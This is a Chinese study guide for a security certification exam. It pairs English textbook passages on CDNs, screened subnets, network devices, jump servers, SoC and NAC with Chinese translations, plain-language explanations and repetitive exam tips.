虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 789 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 72 / PDF P790

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Content Distribution Networks (CDNs) A content distribution network (CDN), or content delivery network, is a collection of resource services deployed in numerous data centers across the Internet to provide low latency, high performance, and high availability of the hosted content. CDNs provide the desired multimedia performance quality demanded by customers through the concept of distributed data hosts. Rather than having media content stored in a single central location to be transmitted to all parts of the Internet, the media is distributed to numerous geographically distributed pre-staging internet locations that are closer to groups of customers.

This results in a type of geographic and logical load balancing (see Chapter 12). No one server or cluster of servers will be strained under the load of all resource requests, and the hosting servers are located closer to the requesting customers. The overall result is lower-latency and higher-quality throughput. There are many CDN service providers, including Cloudflare, Akamai, Amazon CloudFront, and CacheFly. Although most CDNs focus on the physical distribution of servers, clientbased CDN is also possible. This is often referred as P2P (peer-to-peer). The most widely recognized P2P CDN is BitTorrent.

A service delivery platform (SDP) is a collection of components that provide the architecture for service delivery. SDP is often used in relation to telecommunications, but it can be used in many contexts, including VoIP, Internet TV, SaaS, and online gaming. An SDP is similar to a content delivery network (CDN), as both are designed for the support of and efficient delivery of a resource (such as services of an SDP and multimedia of a CDN). The goal of an SDP is to provide transparent communication services to other content or service providers. Both SDPs and CDNs can be implemented using microservices.

Secure Network Components There are two basic types of private network segments: intranets and extranets. An intranet is a private network (i.e., LAN) that is often designed to host information services privately, similar to services found on the Internet. Networks that rely on external servers (in other words, ones positioned on the public internet) to provide information services for internal use are not considered intranets. Intranets provide users with access to the web, email,

中文直译 / 整理

内容分发网络(CDN) 一个 内容分发网络(CDN),或 内容交付网络,是部署在互联网众多数据中心 中的一组资源服务,旨在提供托管内容的低延迟、高性能和高可用性。 CDN 通 过分布式数据主机的概念,提供客户所需的多媒体性能质量。 与其将媒体内容 存储在单一中心位置并传输到互联网的各个部分,不如将媒体分发到地理上分 布的多个预先缓存的互联网节点,这些节点更靠近客户群体。 这实现了某种地 理和逻辑负载均衡(参见 第12章)。 没有任何一台服务器或服务器集群会因所 有资源请求而过载,托管服务器也更靠近请求的客户。 总体结果是更低的延迟 和更高的吞吐量质量。 许多 CDN 服务提供商包括 Cloudflare、Akamai、 Amazon CloudFront 和 CacheFly。 尽管大多数CDN专注于服务器的物理分布,但基于客户端的CDN也是可能的。 这通常被称为P2P(点对点)。 最广为人知的P2P CDN是BitTorrent。 服务交付平台(SDP)是一组提供服务交付架构的组件。 SDP通常与电信相关, 但也可用于许多其他场景,包括VoIP、互联网电视、SaaS和在线游戏。

SDP 与内容分发网络(CDN)类似,因为两者都旨在支持和高效交付资源(如 SDP的服务和CDN的多媒体)。 SDP的目标是为其他内容或服务提供商提供透 明的通信服务。 SDP和CDN均可使用微服务实现。 安全网络组件 私有网络段有两种基本类型:内网和外网。 一个内网是一个私有网络(即局域 网),通常设计用于私密托管信息服务平台,类似于互联网上提供的服务。 依 赖外部服务器(即位于公共互联网上的服务器)提供内部使用信息服务平台的 网络不被视为内网。 内网为用户提供对网络、电子邮件的访问,

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 73 / PDF P791

第 791 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

and other services on internal servers that are not accessible to anyone outside the private network. An extranet is a cross between the Internet and an intranet. An extranet is a section of an organization's network that has been sectioned off so that it acts as an intranet for the private network but also serves information to authorized outsiders or external entities. An extranet is often reserved for use by specific partners, suppliers, distributors, remote salesforce, or select customers. An extranet for public consumption is typically labeled a screened subnet or perimeter network.

A screened subnet (previously known as a demilitarized zone [DMZ]) is a special-purpose extranet that is designed specifically for low-trust and unknown users to access specific systems, such as the public accessing a web server. It can be implemented with two firewalls or one multihomed firewall. The two firewall deployment method positions one firewall between the screened subnet and the Internet and the second between the screened subnet and the intranet. This positions the subnet for outside access as a buffer between the Internet and the intranet, and the firewalls bounding the subnet effectively filter or screen all communications related to it.

The multihomed firewall deployment method uses a single firewall with one interface connected to the Internet, a second interface to the screened subnet, and a third interface to the intranet. A screened host is a firewall-protected system logically positioned just inside a network segment. All inbound traffic is routed to the screened host, which in turn acts as a proxy for all the trusted systems within the private network. It is responsible for filtering traffic coming into the private network as well as for protecting the identity of the internal system. East-west traffic refers to the traffic flow that occurs within a specific network, data center, or cloud environment.

North-south traffic refers to the traffic flow that occurs inbound or outbound between internal systems and external systems. Secure Operation of Hardware Strong familiarity with secure network components can assist you in designing an IT infrastructure that avoids single points of failure and

中文直译 / 整理

以及其他仅限私有网络内部访问的内部服务器上的服务。 一个 extranet 是互联网与内网之间的混合体。 外联网是组织网络中被隔离出来 的一部分,它作为私有网络的内网运行,同时向授权的外部人员或实体提供信 息。 外联网通常专供特定合作伙伴、供应商、分销商、远程销售团队或选定客 户使用。 面向公众的外联网通常被称为筛选子网或边界网络。 一个 screened subnet(以前称为非军事区 [DMZ])是一种专为低信任度和未知 用户访问特定系统(如公众访问 Web 服务器)而设计的特殊外联网。 它可以 使用两个防火墙或一个多重宿主防火墙来实现。 双防火墙部署方式将一个防火 墙置于筛选子网与互联网之间,另一个置于筛选子网与内网之间。 这种部署使 子网成为互联网与内网之间的缓冲区,而边界防火墙能有效过滤或屏蔽与之相 关的所有通信。 多重宿主防火墙部署方式使用一个具有三个接口的防火墙:一 个接口连接互联网,第二个接口连接筛选子网,第三个接口连接内网。 一个 筛选主机 是一个逻辑上位于网络段内部的防火墙保护系统。 所有入站流量 都会被路由到该筛选主机,而该主机则作为私有网络内所有可信系统的代理。

它负责过滤进入私有网络的流量,并保护内部系统的身份。 东西向流量 指的是在特定网络、数据中心或云环境中发生的流量流 动。 南北向流量 指的是内部系统与外部系统之间入站或出站的流量流动。 硬件的安全操作 对安全网络组件的深入了解有助于您设计避免单点故障并

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 791 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 74 / PDF P792

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

provides strong support for availability. Part of operating hardware is to ensure that it is reliable and sufficient to support business operations. Some of the issues to consider in this regard include redundant power, warranty, and support. Computer systems don't work without power. Providing reliable power is essential for a reliable IT/IS infrastructure. The concepts of surge protectors and UPSs were covered in Chapter 10, “Physical Security Requirements,” but another option you should consider is the deployment of redundant power supplies. Most deployments of failover power supplies are configured so that both provide half the power consumed by the system.

But in the event of a failure of one, the other can take over to provide 100 percent of the system's power needs. Some solutions offer hot swapping support so that failed supplies can be replaced or lower-capacity supplies can be swapped out with those with higher capacity. The majority of equipment that is purchased and deployed today will likely operate without issue for years. However, it is still possible for devices to fail, causing excessive downtime or data loss. These problems can be minimized with planning and preparation, such as implementing redundancy and avoiding single-point-of-failure deployments (see Chapter 18, “Disaster Recovery Planning”).

However, that doesn't resolve the issue that you have a failed device. That's when a warranty or a return policy can be helpful. When acquiring equipment, always inquire about the warranty coverage and return policy restrictions. You may be able to get a refund or a replacement if the device fails within a specific time frame. Another aspect of hardware management that might be undervalued is support. Many of the hardware products in use today, such as VPN appliances, firewalls, switches, routers, and WAPs, are quite advanced. Some might even require specialized training or certification just to configure, set up, and deploy.

If your organization does not have staff with expertise and experience with a specific hardware device, then you will need to rely on the support services provided by the vendor. Therefore, when obtaining new equipment, inquire about the technical support services available and whether they are included with the product purchase or if such services require an additional fee, subscription, or contract. Common Network Equipment These are some of the typical hardware devices in a network:

中文直译 / 整理

为可用性提供强有力支持的IT基础设施。 操作硬件的一部分是确保其可靠且 足以支持业务运营。 在此方面需要考虑的一些问题包括冗余电源、保修和支持。 计算机系统在没有电力的情况下无法工作。 提供可靠的电力对于构建可靠的 IT/IS基础设施至关重要。 浪涌保护器和UPS的概念已在第10章“物理安全要 求”中介绍过,但您还应考虑部署冗余电源。 大多数备用电源部署的配置是, 两个电源各自提供系统消耗功率的一半。 但在其中一个电源发生故障时,另一 个电源可以接管并提供系统所需的100%电力。 一些解决方案支持热插拔功能, 以便在电源故障时更换,或用更高容量的电源替换容量较低的电源。 今天采购和部署的大部分设备很可能在多年内正常运行。 然而,设备仍有可能 发生故障,导致过度停机或数据丢失。 通过规划和准备,例如实施冗余并避免 单点故障部署(参见第18章“灾难恢复规划”),可以最小化这些问题。 但这 并不能解决设备已故障的问题。 这时,保修或退货政策就显得有帮助了。 在采 购设备时,务必询问保修范围和退货政策的限制。 如果设备在特定时间内发生 故障,您可能能够获得退款或更换。 硬件管理中另一个可能被低估的方面是支持。

如今使用的许多硬件产品,例如 VPN设备、防火墙、交换机、路由器和无线接入点(WAP),都非常先进。 有些甚至需要专门的培训或认证才能配置、设置和部署。 如果您的组织没有具 备特定硬件设备专业知识和经验的员工,那么您将需要依赖供应商提供的支持 服务。 因此,在采购新设备时,请询问可用的技术支持服务,以及这些服务是 否包含在产品购买中,或者是否需要额外付费、订阅或签订合同。 常见网络设备 以下是网络中一些典型的硬件设备:

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 75 / PDF P793

第 793 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Repeaters, Concentrators, and Amplifiers Repeaters, concentrators, and amplifiers (RCAs) are used to strengthen the communication signal over a cable segment as well as connect network segments that use the same protocol. RCAs operate at OSI Layer 1. Systems on either side of an RCA are part of the same collision domain and broadcast domain. Aka line driver. Multiplexer A multiplexer, often abbreviated as MUX, is a digital electronic device that combines multiple input signals into a single output signal for transmission over a shared medium. Collision Domains vs.

Broadcast Domains A collision occurs when two systems transmit data at the same time onto a connection medium that supports only a single transmission path. A collision domain is the group of networked systems that could cause a collision if any two (or more) systems in that group transmitted simultaneously. Collision domains are divided by using any Layer 2 or higher device. A broadcast occurs when a single system transmits data to all possible recipients. A broadcast domain is the group of networked systems in which all other members receive a broadcast signal when one of the members of the group transmits it.

Usually, the term broadcast domain is used to refer specifically to Ethernet broadcast domains (and not the broadcast features of IPv4). Ethernet broadcast domains are divided by using any Layer 3 or higher device. Hubs Hubs are used to connect multiple systems and connect network segments that use the same protocol. A hub is a multiport repeater. Hubs operate at OSI Layer 1. Systems on either side of a hub are part of the same collision and broadcast domains. Modems A traditional landline dial-up modem (modulator-demodulator) is a communications device that covers or modulates between an analog carrier signal and digital information to support computer communications of PSTN lines.

From about 1960 until the mid-1990s, modems were a common means of WAN communications. Modems have generally been replaced by digital broadband technologies, including cable modems, fiber-optic modems, DSL modems, satellite modems, 802.11 wireless, and various forms of wireless modems.

中文直译 / 整理

中继器、集线器和放大器 中继器、集线器和放大器(RCAs) 用于增强电缆段上 的通信信号,并连接使用相同协议的网络段。 RCAs 工作在 OSI 第 1 层。 位于 RCA 两侧的系统属于同一个冲突域和广播域。 又称 线路驱动器。 多路复用器 多路复用器通常简称为MUX,是一种数字电子设备,可将多个输 入信号组合成一个输出信号,以便在共享介质上传输。 冲突域与广播域 当两个系统同时在仅支持单条传输路径的连接介质上发送数据时,就会发 生冲突。 冲突域 是指如果该组中的任意两个(或更多)系统同时传输数据, 就可能引发冲突的联网系统组。 使用任何第二层或更高层设备可划分冲突 域。 当一个系统向所有可能的接收方发送数据时,就会发生广播。 广播域 是 指当组内任一成员发送信号时,组内所有其他成员都会接收到该广播信号 的联网系统组。 通常,术语广播域 专门指以太网广播域(而非IPv4的广 播功能)。 使用任何第三层或更高层设备可划分以太网广播域。 集线器 集线器 用于连接使用相同协议的多个系统和网络段。 集线器是一种多 端口中继器,工作在OSI第一层。 集线器两侧的系统属于同一个冲突域和广播 域。

调制解调器 传统的固定电话拨号调制解调器(调制器‑解调器)是一种通信设备, 用于在模拟载波信号与数字信息之间进行转换,以支持PSTN线路的计算机通信。 从大约1960年到20世纪90年代中期,调制解调器是广域网通信的常用手段。 调制 解调器通常已被数字宽带技术所取代,包括电缆调制解调器、光纤调制解调器、 DSL调制解调器、卫星调制解调器、802.11无线网络以及各种形式的无线调制解 调器。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 793 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 76 / PDF P794

第 794 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The term modem is used incorrectly on any device that does not actually perform modulation. Most modern devices labeled as modems (cable, DSL, wireless, etc.) are routers, not modems. Integrated cable modem routers contain both functionalities of a modem and router in one device. Bridges A bridge is used to connect two networks together—even networks of different topologies, cabling types, and speeds—to connect network segments that use the same protocol. A bridge forwards traffic from one network to another. Bridges that connect networks using different transmission speeds may have a buffer to store packets until they can be forwarded to the slower network.

This is known as a store-and-forward device. Bridges operate at OSI Layer 2. Bridges were primarily used to connect hub networks together and thus have mostly been replaced by switches. Switches Switches manage the transmission of frames via MAC address. Switches can also create separate broadcast domains when used to create VLANs (see Chapter 12). Switches operate primarily at OSI Layer 2. When switches have additional features, such as routing among VLANs, they can operate at OSI Layer 3 as well, known as Layer 3 switches.

MPLS (Multiprotocol Label Switching) is a high-throughput, high-performance network technology that directs data across a network based on short path labels rather than longer network addresses. This technique saves significant time over traditional IP-based routing processes, which can be quite complex. Furthermore, MPLS is designed to handle a wide range of protocols through encapsulation. Routers Routers are used to control traffic flow on networks and are often used to connect similar networks and control traffic flow between the two. Routers manage traffic based on logical IP addressing.

They can function using statically defined routing tables, or they can employ a dynamic routing system. Routers operate at OSI Layer 3.

中文直译 / 整理

任何实际上并未执行调制功能的设备都错误地使用了调制解调器这一术 语。 大多数被标记为调制解调器的现代设备(如电缆、DSL、无线等)实际 上是路由器,而非调制解调器。 集成式电缆调制解调器路由器将调制解调器 和路由器的两种功能集成在一个设备中。 网桥 一个 网桥 用于连接两个网络——即使这些网络具有不同的拓扑结构、电缆 类型和速度——以连接使用相同协议的网络段。 网桥将流量从一个网络转发到另 一个网络。 连接使用不同传输速度的网络的网桥可能具有缓冲区,用于存储数据 包,直到它们可以被转发到较慢的网络。 这被称为 存储转发设备。 网桥工作在 OSI第2层。 网桥主要用于连接集线器网络,因此大多已被交换机取代。 交换机 交换机 通过MAC地址管理帧的传输。 当交换机用于创建VLAN时,还 可以创建独立的广播域(参见第12章)。 交换机主要工作在OSI第2层。 当交换 机具有额外功能,例如在VLAN之间进行路由时,它们也可以工作在OSI第3层, 称为第3层交换机。 MPLS(多协议标签交换)是一种高吞吐量、高性能的网络技术,它基 于短路径标签而非较长的网络地址来引导数据在网络中传输。

这种技术比传 统的基于IP的路由过程节省大量时间,后者可能非常复杂。 此外,MPLS通 过封装设计用于处理多种协议。 路由器 路由器 用于控制网络上的流量,并常用于连接相似的网络并控制两者 之间的流量。 路由器基于逻辑IP地址管理流量。 它们可以使用静态定义的路由 表运行,也可以采用动态路由系统。 路由器工作在OSI第3层。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 794 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 77 / PDF P795

第 795 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

LAN Extenders A LAN extender is a remote access, multilayer switch used to connect distant networks over WAN links. Aka WAN switch or WAN router. Jumpbox A jump server or jumpbox is a remote access system deployed to make accessing a specific system or network easier or more secure. A jump server is often deployed in extranets, screened subnets, or cloud networks where a standard direct link or private channel is not available or is not considered safe. A jump server can be deployed to receive an in-band VPN connection, but most are configured to accept out-of-band connections, such as direct dial-up or internet-origin broadband links.

No matter what form of connection is used to access the jump server, it is important to ensure that only encrypted connections are employed. Sensor A sensor collects information and then transmits it back to a central system for storage and analysis. Sensors are common elements of fog computing, ICS, IoT, IDS/IPS, and SIEM/security orchestration, automation, and response (SOAR) solutions. Many sensors are based on an SoC (system on a chip). Collector A security collector is any system that gathers data into a log or record file. A collector's function is similar to the functions of auditing, logging, and monitoring.

A collector watches for a specific activity, event, or traffic and then records the information into a record file. Aggregators Aggregators are a type of multiplexor. Numerous inputs are received and directed or transmitted to a single destination. MPLS is an example of an aggregator. Some IDSs/IPSs use aggregators to collect or receive input from numerous sensors and collectors to integrate the data into a single data stream for analysis and processing.

中文直译 / 整理

局域网扩展器 一种局域网扩展器是用于通过WAN链路连接远程网络的远程访问 多层交换机。 也称为WAN交换机或WAN路由器。 Jumpbox 一个跳板服务器或跳板机是一种远程访问系统,用于简化或增强对特 定系统或网络的访问。 跳板服务器通常部署在外部网络、隔离子网或云网络中, 当标准的直接连接或私有通道不可用或不安全时,便使用跳板服务器。 跳板服务 器可以部署为接收带内VPN连接,但大多数配置为接受带外连接,例如直接拨号 或互联网宽带连接。 无论使用何种形式的连接访问跳板服务器,都必须确保仅使 用加密连接。 传感器 一个传感器收集信息,然后将其传输回中央系统进行存储和分析。 传感 器是雾计算、工控系统(ICS)、物联网(IoT)、入侵检测/防御系统( IDS/IPS)以及安全信息与事件管理(SIEM)/安全编排、自动化与响应( SOAR)解决方案中的常见组件。 许多传感器基于片上系统(SoC)。 收集器 一个安全收集器是任何将数据收集到日志或记录文件中的系统。 收集器 的功能与审计、日志记录和监控功能相似。 收集器监视特定的活动、事件或流 量,然后将信息记录到记录文件中。 聚合器 聚合器 是一种多路复用器。

多个输入被接收并定向或传输到单个目的地。 MPLS 是一种聚合器的例子。 一些 IDS/IPS 使用聚合器从众多传感器和收集器 收集或接收输入,以将数据整合为单个数据流进行分析和处理。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 795 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 78 / PDF P796

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

System on a Chip (SoC) A system on a chip (SoC) is an integrated circuit (IC) or chip that has all of the elements of a computer integrated into a single chip. This often includes the main CPU, RAM, GPU, Wi-Fi, wired networking, peripheral interfaces (such as USB), and power management. In most cases, the only item missing from an SoC compared to a full computer is bulk storage. Often, a bulk storage device must be attached or connected to the SoC to store its programs and other files since the SoC usually contains only enough memory to retain its own firmware or OS.

The security risks of an SoC include the fact that the firmware or OS of an SoC is often minimal, which leaves little room for most security features. An SoC may be able to filter input (such as by length or to escape metacharacters), reject unsigned code, provide basic firewall filtering, use communication encryption, and offer secure authentication. However, these features are not universally available on all SoC products. A few devices that use an SoC include the mini-computer Raspberry Pi, fitness trackers, smart watches, and some smartphones.

Network Access Control Network access control (NAC) is the concept of controlling access to an environment through strict adherence to and enforcement of security policy. NAC is meant to be an automated detection and response system that can react in real time to ensure that all monitored systems are current on patches and updates and are in compliance with the latest security configurations, as well as keep unauthorized devices out of the network.

The goals of NAC are as follows: Prevent/reduce known attacks directly and zero-day indirectly Enforce security policy throughout the network Use identities to perform access control The goals of NAC can be achieved through the use of strong, detailed security policies that define all aspects of security control, filtering, prevention, detection, and response for every device from client to server and for every internal or external communication.

中文直译 / 整理

